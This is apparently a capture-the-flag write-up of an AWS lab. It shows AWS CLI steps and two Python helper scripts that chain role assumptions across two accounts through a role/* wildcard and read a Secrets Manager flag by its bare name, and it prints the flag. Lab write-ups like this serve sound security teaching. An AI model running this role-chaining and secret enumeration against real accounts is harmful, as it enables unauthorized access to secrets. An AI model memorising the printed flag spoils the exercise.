You’ve just gained access to the reinier role. Utilize cloudfox and see where it takes you!
First things first: set up the profile (reinier is assumed from the cloudfoxable source profile) and test access.
```
adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile reinier]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/reinier
source_profile = cloudfoxable
adicpnn@laboratory cloud % aws sts get-caller-identity --profile reinier
{
    "UserId": "AROAR4HCPRIDTDEJTABUR:botocore-session-1773311810",
    "Account": "129323993607",
    "Arn": "arn:aws:sts::129323993607:assumed-role/reinier/botocore-session-1773311810"
}
```
Then, enumerate the attached policies.
```
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name reinier --profile cloudfoxable
{
    "AttachedPolicies": [
        {
            "PolicyName": "authorized_deployers",
            "PolicyArn": "arn:aws:iam::129323993607:policy/authorized_deployers"
        },
        {
            "PolicyName": "SecurityAudit",
            "PolicyArn": "arn:aws:iam::aws:policy/SecurityAudit"
        }
    ]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/authorized_deployers --version-id v1 --profile cloudfoxable
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "sts:AssumeRole"
                    ],
                    "Effect": "Allow",
                    "Resource": [
                        "arn:aws:iam::129323993607:role/deployment_automation",
                        "arn:aws:iam::992382614597:role/*"
                    ]
                },
                {
                    "Action": [
                        "s3:GetObject",
                        "s3:ListBucket"
                    ],
                    "Effect": "Allow",
                    "Resource": [
                        "arn:aws:s3:::deployment-automation-qsf7i",
                        "arn:aws:s3:::deployment-automation-qsf7i/*"
                    ]
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2026-03-11T15:44:09+00:00"
    }
}
```
Interesting: the customer managed policy attached to this role grants quite a lot:
- sts:AssumeRole to one role in my account (deployment_automation), and to every role in another account (992382614597) through the role/* wildcard
- s3:ListBucket and s3:GetObject on the deployment-automation-qsf7i bucket, so I can list it and read its contents
I'll start by enumerating the S3 bucket.
```
adicpnn@laboratory cloud % aws s3 ls deployment-automation-qsf7i
2026-03-11 16:44:09     141627 Deployment Process Description.pdf
2026-03-11 16:44:08     135541 Security Review Process.pdf
adicpnn@laboratory cloud % aws s3 sync s3://deployment-automation-qsf7i .
download: s3://deployment-automation-qsf7i/Security Review Process.pdf to ./Security Review Process.pdf
download: s3://deployment-automation-qsf7i/Deployment Process Description.pdf to ./Deployment Process Description.pdf
```
Found two PDF files in here:
- Security Review Process.pdf
  - One bad and one good sample SQL statement :)
- Deployment Process Description.pdf
  - Lists the different deployment environment stages and the procedures in place for promoting code from dev to staging to prod
This gives me some ideas to think about, but for now I'll continue looking into the roles I can assume.
```
adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile deployment]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/deployment_automation
source_profile = reinier
adicpnn@laboratory cloud % aws sts get-caller-identity --profile deployment
{
    "UserId": "AROAR4HCPRID5C7MBZKHG:botocore-session-1773312746",
    "Account": "129323993607",
    "Arn": "arn:aws:sts::129323993607:assumed-role/deployment_automation/botocore-session-1773312746"
}
```
And find its permissions.
```
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name deployment_automation --profile cloudfoxable
{
    "AttachedPolicies": [
        {
            "PolicyName": "deployment_automation",
            "PolicyArn": "arn:aws:iam::129323993607:policy/deployment_automation"
        }
    ]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/deployment_automation --version-id v1 --profile cloudfoxable
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "sts:AssumeRole"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:iam::129323993607:role/secret_reader"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2026-03-11T15:44:09+00:00"
    }
}
```
Another role!
```
adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile sreader]
region = eu-central-1
role_arn = arn:aws:iam::129323993607:role/secret_reader
source_profile = deployment
adicpnn@laboratory cloud % aws sts get-caller-identity --profile sreader
{
    "UserId": "AROAR4HCPRIDRDETOLKD7:botocore-session-1773318844",
    "Account": "129323993607",
    "Arn": "arn:aws:sts::129323993607:assumed-role/secret_reader/botocore-session-1773318844"
}
adicpnn@laboratory cloud % aws iam list-attached-role-policies --role-name secret_reader --profile cloudfoxable
{
    "AttachedPolicies": [
        {
            "PolicyName": "secret_reader",
            "PolicyArn": "arn:aws:iam::129323993607:policy/secret_reader"
        }
    ]
}
adicpnn@laboratory cloud % aws iam get-policy-version --policy-arn arn:aws:iam::129323993607:policy/secret_reader --version-id v1 --profile cloudfoxable
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "secretsmanager:ListSecrets"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                },
                {
                    "Action": [
                        "secretsmanager:GetSecretValue"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2026-03-11T15:43:58+00:00"
    }
}
```
Ok then, so I should be able to read the flag now, great.
```
adicpnn@laboratory cloud % aws secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx --profile sreader
{
    "ARN": "arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx",
    "Name": "SegueFlag",
    "VersionId": "terraform-20260311154358616400000006",
    "SecretString": "Thank you, but your flag is in another castle",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": "2026-03-11T16:43:58.647000+01:00"
}
```
The flag is not here? Maybe this is what the documents in the S3 bucket were referring to. A safe assumption is that these two accounts are mirrored environments, one for staging and one for production, so there should be an identical deployment_automation role in the other account. The role/* grant on the reinier policy means any role name in 992382614597 is worth trying, subject to that role's trust policy accepting the call.
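The policy documents collected so far describe a graph: each Allow on sts:AssumeRole is an edge from the role carrying the policy to the roles its Resource pattern matches. The script below is an added example, not part of this write-up or of CloudFox. It loads the three policies above as constructed input (copied from the get-policy-version output), expands the role/* wildcard against the role names guessed here, and lists every chain reachable from reinier together with the hops that cross an account boundary. The two roles in account 992382614597 are assumptions (their policies could not be read), and only the identity side is modelled: an edge means the caller's policy permits the call, not that the target's trust policy will accept it.

```python
"""Enumerate sts:AssumeRole chains from the identity policies shown above.

Added example; not part of the original post or of CloudFox. Policy documents
are copied from the aws iam get-policy-version output in this write-up. Roles
in account 992382614597 are assumed names (their policies were unreadable).
Only the identity-policy side is modelled: an edge means the caller's policy
permits sts:AssumeRole, not that the target's trust policy will accept it.
"""
import fnmatch
from collections import deque

REINIER = "arn:aws:iam::129323993607:role/reinier"

# Role ARN -> identity policy document attached to it (from the post).
ROLE_POLICIES = {
    REINIER: {"Statement": [
        {"Effect": "Allow", "Action": ["sts:AssumeRole"],
         "Resource": ["arn:aws:iam::129323993607:role/deployment_automation",
                      "arn:aws:iam::992382614597:role/*"]},
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::deployment-automation-qsf7i",
                      "arn:aws:s3:::deployment-automation-qsf7i/*"]},
    ]},
    "arn:aws:iam::129323993607:role/deployment_automation": {"Statement": [
        {"Effect": "Allow", "Action": ["sts:AssumeRole"],
         "Resource": "arn:aws:iam::129323993607:role/secret_reader"},
    ]},
    "arn:aws:iam::129323993607:role/secret_reader": {"Statement": [
        {"Effect": "Allow", "Action": ["secretsmanager:ListSecrets"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["secretsmanager:GetSecretValue"],
         "Resource": "arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx"},
    ]},
}

# Every role we know or guess exists; wildcards are expanded against this set.
KNOWN_ROLES = set(ROLE_POLICIES) | {
    "arn:aws:iam::992382614597:role/deployment_automation",  # assumed (mirror account)
    "arn:aws:iam::992382614597:role/secret_reader",          # assumed (mirror account)
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _covers_assume_role(statement):
    """True if the statement's Action matches sts:AssumeRole.
    IAM action names are case-insensitive and may use * and ? wildcards."""
    return any(fnmatch.fnmatchcase("sts:assumerole", a.lower())
               for a in _as_list(statement.get("Action", [])))


def assume_targets(policy, candidates):
    """Roles from `candidates` that this policy lets its holder assume.
    An explicit Deny wins over any Allow, mirroring IAM evaluation."""
    allowed, denied = set(), set()
    for st in policy.get("Statement", []):
        if not _covers_assume_role(st):
            continue
        bucket = allowed if st.get("Effect") == "Allow" else denied
        for pattern in _as_list(st.get("Resource", [])):
            bucket.update(r for r in candidates if fnmatch.fnmatchcase(r, pattern))
    return allowed - denied


def wildcard_grants(policy):
    """Allow resources containing wildcards: these reach roles not enumerated
    yet, so they deserve a name-guessing pass (as done in this post)."""
    return [res for st in policy.get("Statement", [])
            if st.get("Effect") == "Allow" and _covers_assume_role(st)
            for res in _as_list(st.get("Resource", [])) if "*" in res or "?" in res]


def role_chains(start, policies=ROLE_POLICIES, known=KNOWN_ROLES):
    """Breadth-first walk of AssumeRole edges; returns {role: shortest chain}."""
    chains = {start: [start]}
    queue = deque([start])
    while queue:
        current = queue.popleft()
        for nxt in sorted(assume_targets(policies.get(current, {}), known)):
            if nxt not in chains:
                chains[nxt] = chains[current] + [nxt]
                queue.append(nxt)
    return chains


def account_of(arn):
    return arn.split(":")[4]


def cross_account_hops(chains):
    """Edges in the discovered chains whose source and target accounts differ."""
    hops = {(a, b) for chain in chains.values()
            for a, b in zip(chain, chain[1:]) if account_of(a) != account_of(b)}
    return sorted(hops)


if __name__ == "__main__":
    found = role_chains(REINIER)
    for chain in found.values():
        print(" -> ".join(f"{r.rsplit('/', 1)[1]}@{account_of(r)}" for r in chain))
    print("wildcard grants on start role:", wildcard_grants(ROLE_POLICIES[REINIER]))
    print("cross-account hops:", cross_account_hops(found))
```

Run stand-alone, it prints one line per reachable role. One thing it makes visible that the manual walk does not: the role/* grant also permits reinier to assume 992382614597's secret_reader directly, without passing through deployment_automation, if that role's trust policy allows it. Identity-side wildcards across an account boundary are exactly what a defender should be grepping policies for.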
```
[profile external_deployment]
region = eu-central-1
role_arn = arn:aws:iam::992382614597:role/deployment_automation
source_profile = reinier
adicpnn@laboratory cloud % aws sts get-caller-identity --profile external_deployment
{
    "UserId": "AROA6ODU47RCSYM7JNVB4:botocore-session-1773319202",
    "Account": "992382614597",
    "Arn": "arn:aws:sts::992382614597:assumed-role/deployment_automation/botocore-session-1773319202"
}
```
The assumption was right. Maybe there is again an assumable secret_reader role? This time I don't have the SecurityAudit managed policy in that account to gather more information, so I need to blindly try to assume the role.
```
adicpnn@laboratory cloud % aws sts assume-role --role-arn arn:aws:iam::992382614597:role/secret_reader --role-session-name secret --profile external_deployment
{
    "Credentials": {
        "AccessKeyId": "nope",
        "SecretAccessKey": "nope",
        "SessionToken": "nope",
        "Expiration": "2026-03-12T13:42:32+00:00"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROA6ODU47RCW5NAHFAUT:secret",
        "Arn": "arn:aws:sts::992382614597:assumed-role/secret_reader/secret"
    }
}
```
Indeed there is! That gives me almost all the information I need, with two caveats:
- The secret might be in a different region, so I need to account for that
  - I will assume the secret is hosted in the same region as CloudFoxable's default one, us-west-2
- I don't know the full ARN of this secret
Quoting the AWS documentation:
Secrets Manager includes six random characters at the end of the secret name to help ensure that the secret ARN is unique. If the original secret is deleted, and then a new secret is created with the same name, the two secrets have different ARNs because of these characters. Users with access to the old secret don't automatically get access to the new secret because the ARNs are different.
Secrets Manager constructs an ARN for a secret with Region, account, secret name, and then a hyphen and six more characters, as follows: arn:aws:secretsmanager:us-east-2:111122223333:secret:SecretName-abcdef
What this means is that the six-character suffix in the other account will not be the NkRElx seen here, so the full ARN cannot be guessed. The way around it is that --secret-id also accepts the secret's name, so I retrieve it by its bare name, SegueFlag, leaving out the trailing hyphen and characters.
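Both caveats can be handled in one small tool. The script below is an added example, not code from the original post: it strips the per-secret suffix from an ARN to get the bare name, sweeps a list of candidate regions with that name, and unwraps the SecretString whether it is a plain string (as in the decoy above) or a JSON object of key/value pairs. FakeSecretsClient and SAMPLE_STORE are constructed stand-ins for boto3 and for the target account so it runs offline; boto3_factory is the live path and assumes boto3 is installed.

```python
"""Locate a Secrets Manager secret by name across regions and unwrap its value.

Added example; not code from the original post. The -XXXXXX suffix is
per-secret, so the lookup uses the bare name; the region is unknown, so the
candidate regions are swept in turn. FakeSecretsClient and SAMPLE_STORE are
constructed stand-ins for boto3 and the target account (offline run);
boto3_factory is the live path and needs boto3 installed.
"""
import json
import re

# Trailing "-" plus exactly six alphanumerics, as documented by AWS.
_SUFFIX = re.compile(r"^(.*)-[A-Za-z0-9]{6}$")

# Error codes that mean "not this region", not "stop". An identity policy
# scoped to a single secret ARN (like secret_reader's above) can make a
# missing secret surface as AccessDeniedException instead of
# ResourceNotFoundException, so both are treated as "keep looking".
SKIPPABLE = {"ResourceNotFoundException", "AccessDeniedException"}


def secret_name_from_arn(secret_id):
    """'...:secret:SegueFlag-NkRElx' -> 'SegueFlag'. A plain name passes
    through untouched, so a name that happens to end in six characters is
    not mangled."""
    if ":secret:" not in secret_id:
        return secret_id
    tail = secret_id.rsplit(":secret:", 1)[1]
    match = _SUFFIX.match(tail)
    return match.group(1) if match else tail


def unwrap_secret(secret_string):
    """SecretString is either a bare string or a JSON object of key/value
    pairs (both forms appear in this write-up). Always return a dict."""
    try:
        value = json.loads(secret_string)
    except ValueError:
        return {"": secret_string}
    return value if isinstance(value, dict) else {"": secret_string}


def _error_code(exc):
    """botocore's ClientError carries the AWS error code in exc.response;
    the fake client below raises exceptions named after the code."""
    response = getattr(exc, "response", None)
    if isinstance(response, dict):
        return response.get("Error", {}).get("Code")
    return type(exc).__name__


def find_secret(secret_id, regions, client_factory, skipped=None):
    """Call get_secret_value with the bare name in each region.
    Returns (region, arn, values) for the first hit, else None. Regions that
    answered with a skippable error are recorded in `skipped` if given."""
    name = secret_name_from_arn(secret_id)
    for region in regions:
        try:
            resp = client_factory(region).get_secret_value(SecretId=name)
        except Exception as exc:  # the code decides; anything else propagates
            code = _error_code(exc)
            if code not in SKIPPABLE:
                raise
            if skipped is not None:
                skipped[region] = code
            continue
        return region, resp["ARN"], unwrap_secret(resp["SecretString"])
    return None


def boto3_factory(profile):
    """Live client factory for a named AWS CLI profile (requires boto3)."""
    import boto3

    def make(region):
        session = boto3.session.Session(profile_name=profile, region_name=region)
        return session.client("secretsmanager")
    return make


# ---- constructed offline stand-in for the target account -------------------
class ResourceNotFoundException(Exception):
    pass


# region -> {name: SecretString}; constructed to mirror account 992382614597 in the post.
SAMPLE_STORE = {
    "us-west-2": {"SegueFlag": json.dumps(
        {"SegueFlag": "FLAG{SEGUE:protect_roles_from_unintended_cross_account_access}"})},
}


class FakeSecretsClient:
    def __init__(self, region, store=SAMPLE_STORE):
        self.region, self.store = region, store

    def get_secret_value(self, SecretId):
        try:
            secret = self.store[self.region][SecretId]
        except KeyError:
            raise ResourceNotFoundException(SecretId) from None
        arn = f"arn:aws:secretsmanager:{self.region}:992382614597:secret:{SecretId}-9Jlveb"
        return {"ARN": arn, "Name": SecretId, "SecretString": secret}


if __name__ == "__main__":
    tried = {}
    hit = find_secret("arn:aws:secretsmanager:eu-central-1:129323993607:secret:SegueFlag-NkRElx",
                      ["eu-central-1", "us-east-1", "us-west-2"], FakeSecretsClient, skipped=tried)
    print("skipped:", tried)
    print("found:", hit)
```

Against a real account, replace FakeSecretsClient with boto3_factory("external_secret") and pass the region list you want to sweep. Keeping the skipped map matters: a run that reports AccessDeniedException everywhere is a permissions problem to go back to, not evidence the secret does not exist.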
I’ll prepare the aws profile before attempting to read the secret.
```
adicpnn@laboratory cloud % cat ~/.aws/config | tail
[profile external_secret]
region = eu-central-1
role_arn = arn:aws:iam::992382614597:role/secret_reader
source_profile = external_deployment
adicpnn@laboratory cloud % aws sts get-caller-identity --profile external_secret
{
    "UserId": "AROA6ODU47RCW5NAHFAUT:botocore-session-1773319905",
    "Account": "992382614597",
    "Arn": "arn:aws:sts::992382614597:assumed-role/secret_reader/botocore-session-1773319905"
}
```
Execution
All that’s left now is to get the flag!
```
adicpnn@laboratory cloud % aws secretsmanager get-secret-value --region us-west-2 --secret-id SegueFlag --profile external_secret
{
    "ARN": "arn:aws:secretsmanager:us-west-2:992382614597:secret:SegueFlag-9Jlveb",
    "Name": "SegueFlag",
    "VersionId": "b60d8f60-e18b-4dff-b520-fe88d8a924ea",
    "SecretString": "{\"SegueFlag\":\"FLAG{SEGUE:protect_roles_from_unintended_cross_account_access}\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": "2024-04-26T19:43:23.342000+02:00"
}
```